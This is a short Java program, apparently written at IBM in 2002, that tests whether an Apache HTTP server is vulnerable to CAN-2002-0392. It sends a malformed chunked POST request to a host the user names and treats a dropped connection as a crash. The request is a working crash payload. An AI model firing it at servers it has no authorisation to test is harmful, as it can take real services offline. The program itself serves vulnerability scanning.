import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.InetAddress;
import java.net.Socket;
import java.net.SocketException;

/*
*	
*	Wed Jul 31 17:37:00 EDT 2002
*	pmcmahan@us.ibm.com
*	
*	Copyright 2002 IBM.  All rights reserved.

*	This program checks to see if an apache http server is vulnerable
*	to the attack described in CAN-2002-0392 (cve.mitre.org).

*	Usage: ApacheTest hostname [port_number]
*	
*/

public class ApacheTest {

	public static void main(String[] args) {
		
		BufferedWriter bw = null;
		BufferedReader br = null;
		int port = 80;
		
		if (args.length < 1) usage();
		if (args[0].equals("-h")) usage();
		if (args[0].equals("-?")) usage();

		try
		{
			if (args.length > 1)
				port = Integer.parseInt(args[1]);
		} catch (Throwable t) {
			usage();
		}
		
		try
		{
			InetAddress addr = InetAddress.getByName(args[0]);
			Socket socket = new Socket(addr, port);
			bw = new BufferedWriter (new OutputStreamWriter(socket.getOutputStream()));
			br = new BufferedReader( new InputStreamReader( socket.getInputStream() ));
			
			// send the "malicious" request
			bw.write("POST http://localhost/index.html HTTP/1.1\n");
			bw.write("Accept: */*\n");
			bw.write("Host: www\n");
			bw.write("Content-Type: application/x-www-form-urlencoded\n");
			bw.write("Transfer-Encoding: chunked\n");
			bw.write("Content-length: 5000\n");
			bw.write("\n");
			for (int i = 0; i < 5000; i++)
				bw.write("a");
			bw.write("\n");
			bw.flush();
			
			
			// if we do not get a response then the HTTP server must have crashed
			// because it is vulnerable to the attack
			try
			{
				if (br.read() == -1)
				{
					System.out.println(args[0] + ":" + port + " is vulnerable");
				}
				else
				{
					System.out.println(args[0] + ":" + port + " is not vulnerable");
				}
			} catch (SocketException se) {
					System.out.println(args[0] + ":" + port + " is vulnerable");
			}
		}
		catch (Throwable t)
		{
			t.printStackTrace();
		}
		finally
		{
			try
			{
				bw.close();
				br.close();
			} catch (Throwable t) {}
		}
		
	}

	public static void usage() {
		System.out.println("\nThis program checks to see if an apache server is vulnerable");
		System.out.println("to the attack described in CAN-2002-0392 (cve.mitre.org).");
		System.out.println("\nUsage: ApacheTest hostname [port_number]");
		System.exit(1);
	}
}